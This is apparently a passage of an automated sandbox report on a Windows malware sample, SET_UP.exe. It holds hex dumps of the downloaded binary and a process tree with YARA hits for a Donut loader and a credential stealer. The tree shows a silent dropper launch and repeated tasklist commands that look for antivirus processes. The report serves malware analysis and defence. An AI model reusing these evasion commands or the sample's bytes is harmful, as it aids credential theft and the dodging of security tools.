                                                                                                                                          2024-12-25 21:17:31 UTC1369INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                          2024-12-25 21:17:31 UTC1369INData Raw: 09 4e 61 74 69 76 65 49 6e 74 04 00 00 00 80 ff ff ff 7f 02 00 00 00 74 11 40 00 01 0a 4e 61 74 69 76 65 55 49 6e 74 05 00 00 00 00 ff ff ff ff 02 00 00 90 11 40 00 04 06 53 69 6e 67 6c 65 00 02 00 00 a0 11 40 00 04 08 45 78 74 65 6e 64 65 64 02 02 00 00 00 00 b4 11 40 00 04 06 44 6f 75 62 6c 65 01 02 00 00 c4 11 40 00 04 04 43 6f 6d 70 03 02 00 00 00 00 d4 11 40 00 04 08 43 75 72 72 65 6e 63 79 04 02 00 00 00 00 e8 11 40 00 05 0b 53 68 6f 72 74 53 74 72 69 6e 67 ff 02 00 fc 11 40 00 14 09 50 41 6e 73 69 43 68 61 72 30 10 40 00 02 00 00 00 00 14 12 40 00 14 09 50 57 69 64 65 43 68 61 72 4c 10 40 00 02 00 00 00 00 2c 12 40 00 03 08 42 79 74 65 42 6f 6f 6c 00 00 00 00 80 ff ff ff 7f 28 12 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00
                                                                                                                                          Data Ascii: NativeIntt@NativeUInt@Single@Extended@Double@Comp@Currency@ShortString@PAnsiChar0@@PWideCharL@,@ByteBool(@FalseTrueSystem
                                                                                                                                          2024-12-25 21:17:31 UTC1369INData Raw: 00 02 00 0b 28 9c 4a 00 0c 26 6f 70 5f 4c 65 73 73 54 68 61 6e 00 00 00 10 40 00 02 12 98 15 40 00 04 4c 65 66 74 02 00 12 98 15 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 13 26 6f 70 5f 4c 65 73 73 54 68 61 6e 4f 72 45 71 75 61 6c 00 00 00 10 40 00 02 12 98 15 40 00 04 4c 65 66 74 02 00 12 98 15 40 00 05 52 69 67 68 74 02 00 02 00 7c 17 40 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 1f 40 00 00 00 00 00 7c 17 40 00 00 00 00 00 92 18 40 00 08 00 00 00 00 00 00 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 22 00 9a 18 40 00 44 00 f4 ff c0 18 40 00 42 00 f4 ff e4 18 40 00 42 00 f4 ff 0d 19 40 00 43 00 f4 ff 4b 19 40 00 42 00 f4 ff 7a 19 40 00 42 00 f4 ff a3
                                                                                                                                          Data Ascii: (J&op_LessThan@@Left@Right(J&op_LessThanOrEqual@@Left@Right|@@|@@~@@@@@@@@}@}@}@"@D@B@B@CK@Bz@B
                                                                                                                                          2024-12-25 21:17:31 UTC1369INData Raw: 41 64 64 72 65 73 73 03 00 00 11 40 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 04 4e 61 6d 65 02 00 02 00 46 00 04 7f 40 00 0c 47 65 74 49 6e 74 65 72 66 61 63 65 03 00 00 10 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 12 40 13 40 00 01 00 03 49 49 44 02 00 20 00 00 00 00 02 00 03 4f 62 6a 02 00 02 00 3e 00 68 7f 40 00 11 47 65 74 49 6e 74 65 72 66 61 63 65 45 6e 74 72 79 03 00 a0 14 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 40 13 40 00 01 00 03 49 49 44 02 00 02 00 31 00 28 9c 4a 00 11 47 65 74 49 6e 74 65 72 66 61 63 65 54 61 62 6c 65 03 00 2c 15 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 33 00 ac 7f 40 00 08 55 6e 69 74 4e 61 6d 65 03 00 b8 12 40 00 08 00 02 00 00 00 00
                                                                                                                                          Data Ascii: Address@@Self@NameF@GetInterface@@Self@@IID Obj>h@GetInterfaceEntry@Self@@IID1(JGetInterfaceTable,@Self3@UnitName@
                                                                                                                                          2024-12-25 21:17:31 UTC1369INData Raw: 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 00 00 00 00 0f 55 6e 73 61 66 65 41 74 74 72 69 62 75 74 65 00 00 94 21 40 00 07 0f 55 6e 73 61 66 65 41 74 74 72 69 62 75 74 65 78 21 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 18 22 40 00 00 00 00 00 00 00 00 00 00 00 00 00 34 22 40 00 00 00 00 00 18 22 40 00 00 00 00 00 1e 22 40 00 08 00 00 00 c4 1f 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 00 00 00 00 11 56 6f 6c 61 74 69 6c 65 41 74 74 72 69 62 75 74 65 34 22 40 00 07 11 56 6f 6c 61 74 69 6c 65 41 74 74 72 69 62 75 74 65 18 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 b8 22 40
                                                                                                                                          Data Ascii: @@}@}@}@UnsafeAttribute!@UnsafeAttributex!@4 @System"@4"@"@"@@~@@@@@@@@}@}@}@VolatileAttribute4"@VolatileAttribute"@4 @System"@
                                                                                                                                          2024-12-25 21:17:31 UTC1369INData Raw: 74 02 00 02 00 09 e8 89 40 00 08 50 75 6c 73 65 41 6c 6c 00 00 00 00 00 00 01 0a 9c 1f 40 00 07 41 4f 62 6a 65 63 74 02 00 02 00 ec 26 40 00 0f 0a 49 49 6e 74 65 72 66 61 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 20 27 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 e8 26 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 6d 01 00 ff ff 02 00 00 54 27 40 00 0f 09 49 44 69 73 70 61 74 63 68 e8 26 40 00 01 00 04 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 04 00 ff ff 02 00 00 00 00 cc 83 44 24 04 f8 e9 81 ca 00 00 83 44 24 04 f8 e9 9f ca 00 00 83 44 24 04 f8 e9 b1 ca 00 00 cc 85 27 40 00 8f 27 40 00 99 27 40 00 01 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: t@PulseAll@AObject&@IInterfaceFSystem '@IEnumerable&@SystemT'@IDispatch&@FSystemD$D$D$'@'@'@
                                                                                                                                          2024-12-25 21:17:31 UTC1369INData Raw: 6f 75 6e 74 02 00 cc 10 40 00 02 00 00 00 02 05 46 6c 61 67 73 02 00 9c 10 40 00 04 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 9c 10 40 00 08 00 00 00 02 09 4c 6f 63 6b 43 6f 75 6e 74 02 00 00 11 40 00 0c 00 00 00 02 04 44 61 74 61 02 00 a8 2b 40 00 10 00 00 00 02 06 42 6f 75 6e 64 73 02 00 02 00 00 00 00 84 2c 40 00 0e 0a 54 56 61 72 52 65 63 6f 72 64 08 00 00 00 00 00 00 00 00 02 00 00 00 00 11 40 00 00 00 00 00 02 07 50 52 65 63 6f 72 64 02 00 00 11 40 00 04 00 00 00 02 07 52 65 63 49 6e 66 6f 02 00 02 00 00 00 00 cc 2c 40 00 0e 08 54 56 61 72 44 61 74 61 10 00 00 00 00 00 00 00 00 20 00 00 00 cc 10 40 00 00 00 00 00 02 05 56 54 79 70 65 02 00 cc 10 40 00 02 00 00 00 02 09 52 65 73 65 72 76 65 64 31 02 00 cc 10 40 00 04 00 00 00 02 09 52 65
                                                                                                                                          Data Ascii: ount@Flags@ElementSize@LockCount@Data+@Bounds,@TVarRecord@PRecord@RecInfo,@TVarData @VType@Reserved1@Re
                                                                                                                                          2024-12-25 21:17:31 UTC1369INData Raw: 40 00 00 00 00 00 02 08 56 56 61 72 69 61 6e 74 02 00 00 11 40 00 00 00 00 00 02 0a 56 49 6e 74 65 72 66 61 63 65 02 00 00 11 40 00 00 00 00 00 02 0b 56 57 69 64 65 53 74 72 69 6e 67 02 00 b4 2a 40 00 00 00 00 00 02 06 56 49 6e 74 36 34 02 00 00 11 40 00 00 00 00 00 02 0e 56 55 6e 69 63 6f 64 65 53 74 72 69 6e 67 02 00 54 11 40 00 00 00 00 00 02 0a 5f 52 65 73 65 72 76 65 64 31 02 00 b4 10 40 00 04 00 00 00 02 05 56 54 79 70 65 02 00 02 00 00 00 00 00 00 0c 32 40 00 0e 0b 54 50 74 72 57 72 61 70 70 65 72 04 00 00 00 00 00 00 00 00 01 00 00 00 a0 2a 40 00 00 00 00 00 00 05 56 61 6c 75 65 02 00 02 00 06 00 0a 28 9c 4a 00 06 43 72 65 61 74 65 00 00 00 00 00 00 01 00 54 11 40 00 06 41 56 61 6c 75 65 02 00 02 00 0a c0 f5 40 00 06 43 72 65 61 74 65 00 00 00 00
                                                                                                                                          Data Ascii: @VVariant@VInterface@VWideString*@VInt64@VUnicodeStringT@_Reserved1@VType2@TPtrWrapper*@Value(JCreateT@AValue@Create
                                                                                                                                          2024-12-25 21:17:31 UTC1369INData Raw: 28 9c 4a 00 0a 52 65 61 6c 6c 6f 63 4d 65 6d 03 00 08 32 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 08 32 40 00 01 00 06 4f 6c 64 50 74 72 02 00 00 54 11 40 00 02 00 07 4e 65 77 53 69 7a 65 02 00 02 00 34 00 28 9c 4a 00 07 46 72 65 65 4d 65 6d 03 00 00 00 00 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 08 32 40 00 01 00 03 50 74 72 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 cc 4b 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66
                                                                                                                                          Data Ascii: (JReallocMem2@Self2@OldPtrT@NewSize4(JFreeMemSelf2@Ptrb(JCopySelfK@Src@StartIndex2@Dest@Countb(JCopySelf
                                                                                                                                          2024-12-25 21:17:31 UTC1369INData Raw: 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 28 4d 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 60 4d 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53
                                                                                                                                          Data Ascii: 2@Dest@Countb(JCopySelf2@Src(M@Dest@StartIndex@Countb(JCopySelf`M@Src@StartIndex2@Dest@Countb(JCopyS


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:16:16:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\SET_UP.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:74'139'832 bytes
                                                                                                                                          MD5 hash:117C82DB1BC3C31C9196BD4A949F3358
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1897227227.000000000089E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:16:17:44
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe"
                                                                                                                                          Imagebase:0x320000
                                                                                                                                          File size:8'371'434 bytes
                                                                                                                                          MD5 hash:2A2989ED741C431F4A3276264F7BDB61
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 3%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:16:17:45
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$20426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe"
                                                                                                                                          Imagebase:0x8c0000
                                                                                                                                          File size:3'367'424 bytes
                                                                                                                                          MD5 hash:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:16:17:46
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART
                                                                                                                                          Imagebase:0x320000
                                                                                                                                          File size:8'371'434 bytes
                                                                                                                                          MD5 hash:2A2989ED741C431F4A3276264F7BDB61
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:16:17:47
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$30426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART
                                                                                                                                          Imagebase:0x8e0000
                                                                                                                                          File size:3'367'424 bytes
                                                                                                                                          MD5 hash:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:16:17:50
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\timeout.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"timeout" 9
                                                                                                                                          Imagebase:0x800000
                                                                                                                                          File size:32'768 bytes
                                                                                                                                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:16:17:50
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                          Imagebase:0x7ff65f9f0000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                          Imagebase:0x7ff6abfd0000
                                                                                                                                          File size:106'496 bytes
                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:find /I "wrsa.exe"
                                                                                                                                          Imagebase:0x7ff628a60000
                                                                                                                                          File size:17'920 bytes
                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:14
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                          Imagebase:0x7ff65f9f0000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:15
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:16
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                          Imagebase:0x7ff6abfd0000
                                                                                                                                          File size:106'496 bytes
                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:17
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:find /I "opssvc.exe"
                                                                                                                                          Imagebase:0x7ff628a60000
                                                                                                                                          File size:17'920 bytes
                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:18
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                          Imagebase:0x7ff65f9f0000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:19
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:20
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                          Imagebase:0x7ff6abfd0000
                                                                                                                                          File size:106'496 bytes
                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:21
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:find /I "avastui.exe"
                                                                                                                                          Imagebase:0x7ff628a60000
                                                                                                                                          File size:17'920 bytes
                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:22
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                          Imagebase:0x7ff65f9f0000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:23
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:24
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
